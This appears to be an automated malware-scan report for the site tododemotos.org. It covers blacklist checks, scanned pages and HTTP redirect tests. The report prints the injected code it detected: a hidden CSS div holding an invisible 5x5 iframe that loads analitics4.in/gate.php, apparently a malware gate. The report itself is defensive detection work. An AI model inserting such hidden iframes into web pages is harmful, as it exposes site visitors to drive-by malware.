Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tododemotos.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tododemotos.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://tododemotos.org/ | 403 Forbidden Content-Length: 1282 Content-Type: text/html | malicious |
Page code contains blacklisted domain: analitics4.in ...[66 bytes skipped]... ITLE> </HEAD> <BODY> <H1>Forbidden</H1> You do not have permission to access this document. <P> <HR> <ADDRESS> Web Server at tododemotos.org </ADDRESS> <!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div class=pofasdfhg><iframe src=http://analitics4.in/gate.php?f=1135631 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi--> </body> </HTML> <!-- - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, ...[529 bytes skipped]... Malicious iFrame found. size: 5x5 src: http://analitics4.in/gate.php?f=1135631 This URL is marked by Google as suspicious <iframe src=http://analitics4.in/gate.php?f=1135631 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0> | ||
http://tododemotos.org/test404page.js | 403 Forbidden Content-Length: 1282 Content-Type: text/html | malicious |
Page code contains blacklisted domain: analitics4.in ...[66 bytes skipped]... ITLE> </HEAD> <BODY> <H1>Forbidden</H1> You do not have permission to access this document. <P> <HR> <ADDRESS> Web Server at tododemotos.org </ADDRESS> <!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div class=pofasdfhg><iframe src=http://analitics4.in/gate.php?f=1135631 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi--> </body> </HTML> <!-- - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, ...[529 bytes skipped]... Malicious iFrame found. size: 5x5 src: http://analitics4.in/gate.php?f=1135631 This URL is marked by Google as suspicious <iframe src=http://analitics4.in/gate.php?f=1135631 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tododemotos.org
Result:
HTTP/1.1 403 Forbidden
Connection: close
Date: Wed, 01 Oct 2014 20:38:35 GMT
Accept-Ranges: bytes
ETag: "3338d8f-502-4bde1dbeee380"
Server: Apache
Content-Length: 1282
Content-Type: text/html
Last-Modified: Tue, 17 Apr 2012 15:47:42 GMT
X-Powered-By: PleskLin
...1282 bytes of data.
GET / HTTP/1.1
Host: tododemotos.org
Result:
HTTP/1.1 403 Forbidden
Connection: close
Date: Wed, 01 Oct 2014 20:38:35 GMT
Accept-Ranges: bytes
ETag: "3338d8f-502-4bde1dbeee380"
Server: Apache
Content-Length: 1282
Content-Type: text/html
Last-Modified: Tue, 17 Apr 2012 15:47:42 GMT
X-Powered-By: PleskLin
...1282 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tododemotos.org
Referer: http://www.google.com/search?q=tododemotos.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tododemotos.org
Referer: http://www.google.com/search?q=tododemotos.org
Result:
The result is similar to the first query. There are no suspicious redirects found.